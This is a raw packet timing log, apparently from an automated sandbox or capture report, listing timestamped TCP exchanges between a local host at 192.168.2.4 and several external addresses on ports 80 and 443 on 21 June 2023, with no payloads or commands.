                                                                                                  Jun 21, 2023 20:24:00.966270924 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:00.966320992 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.036869049 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.036952019 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.061214924 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.061260939 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.061893940 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.061989069 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.065026999 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.104985952 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.105078936 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.105101109 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.105153084 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.105159998 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.105209112 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.138626099 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.138688087 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.138710022 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.138736010 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.138761044 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.138778925 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.139528036 CEST49709443192.168.2.4162.0.217.254
                                                                                                  Jun 21, 2023 20:24:01.139561892 CEST44349709162.0.217.254192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.143037081 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.143157959 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.145137072 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.145186901 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.145224094 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.145260096 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.149710894 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.149789095 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.149898052 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.149959087 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.150239944 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.150288105 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.150346041 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.150346041 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.150386095 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.150439978 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.156302929 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.156373978 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.156594038 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.156641960 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.156663895 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.156712055 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.390305042 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.390389919 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.390609980 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.390676975 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.390687943 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.390738010 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.394690037 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.394782066 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.394870996 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.394929886 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.397224903 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.397300005 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.404165983 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.404252052 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.404345036 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.404412985 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.404475927 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.404505968 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.404525995 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.404553890 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.404833078 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.404889107 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.410759926 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.410783052 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.410830975 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.410862923 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.410878897 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.410938025 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.410949945 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.411015987 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.641894102 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.641993999 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.642190933 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.642261982 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.642265081 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.642324924 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.647748947 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.647821903 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.647891998 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.647960901 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.648118019 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.648175001 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.653640032 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.653727055 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.653783083 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.653831005 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.655807972 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.655903101 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.656114101 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.656187057 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.656558037 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.656627893 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.656632900 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.656687021 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.661737919 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.661866903 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.662013054 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.662079096 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.662513018 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.662575006 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.662595987 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.662626982 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.758476019 CEST4970380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:01.776437044 CEST8049703104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.776516914 CEST4970380192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:01.823458910 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:01.841684103 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.841820002 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:01.850739002 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:01.850790977 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:01.869280100 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.869327068 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.893902063 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.893975973 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.894167900 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.894210100 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.894264936 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.894303083 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.899749041 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.899801970 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.900094986 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.900135040 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.900180101 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.900217056 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.905622005 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.905678988 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.905814886 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.905884981 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.907808065 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.907861948 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.908042908 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.908097029 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.911506891 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.911576986 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.911801100 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.911844969 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.911855936 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.911883116 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.914187908 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.914278030 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.914429903 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.914496899 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.914812088 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.914861917 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.914884090 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.914912939 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:01.994980097 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.995027065 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:01.995105982 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:02.021462917 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:02.022939920 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:02.038604021 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.039779902 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.099668980 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.099698067 CEST8049710104.21.18.99192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.100691080 CEST4971080192.168.2.4104.21.18.99
                                                                                                  Jun 21, 2023 20:24:02.140351057 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.140383959 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.141422987 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.143662930 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.144032955 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.145889044 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.146023989 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.146083117 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.146258116 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.151818037 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.152041912 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.152230024 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.152403116 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.152503014 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.158037901 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.158222914 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.158658981 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.158710003 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.158762932 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.160832882 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.163887978 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.164216042 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.164556980 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.164606094 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.164611101 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.165186882 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.165638924 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.169756889 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.169831991 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.170121908 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.170171022 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.170229912 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.172817945 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.192433119 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.192477942 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.210850000 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:02.397980928 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.398042917 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.398092985 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.398148060 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.400929928 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.403731108 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.403950930 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.404058933 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.404093981 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.404129982 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.404716015 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.409692049 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.409791946 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.409862995 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.411534071 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.411834955 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.411928892 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.412095070 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.412285089 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.415545940 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.415699959 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.415770054 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.415849924 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.417762041 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.417979956 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.418040991 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.419996977 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.421830893 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.422100067 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.422163010 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.422585964 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.422633886 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.422677994 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.422720909 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.423584938 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.423702002 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.498008013 CEST8049712186.182.55.44192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.498234034 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:02.510046959 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.513762951 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.519404888 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.519433022 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.519876957 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.540086985 CEST4971280192.168.2.4186.182.55.44
                                                                                                  Jun 21, 2023 20:24:02.649995089 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.650226116 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.650331020 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.651716948 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.653326988 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.655791998 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.655947924 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.656089067 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.656188011 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.657237053 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.658790112 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.661619902 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.661737919 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.662048101 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.662151098 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.662257910 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.667543888 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.667927027 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.667995930 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.668086052 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.669673920 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.669732094 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.669965029 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.673897028 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.673975945 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.674151897 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.674202919 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.674238920 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.674494982 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.674774885 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.674879074 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.675044060 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.675091028 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.675128937 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.676310062 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.737710953 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.780292988 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.886485100 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.886548042 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.886565924 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.886610985 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.886744976 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.886744976 CEST49711443192.168.2.4103.233.24.19
                                                                                                  Jun 21, 2023 20:24:02.886784077 CEST44349711103.233.24.19192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.901846886 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.902106047 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.907776117 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.907855988 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.908026934 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.908179998 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.908220053 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.912892103 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.914514065 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.914756060 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.915087938 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.915136099 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.915139914 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.915488958 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.920608044 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.920841932 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.921809912 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.922095060 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.922158957 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.922199011 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.924468994 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.925811052 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.926140070 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.926182032 CEST4970780192.168.2.4190.229.19.7
                                                                                                  Jun 21, 2023 20:24:02.926558971 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.926608086 CEST8049707190.229.19.7192.168.2.4
                                                                                                  Jun 21, 2023 20:24:02.926646948 CEST4970780192.168.2.4190.229.19.7
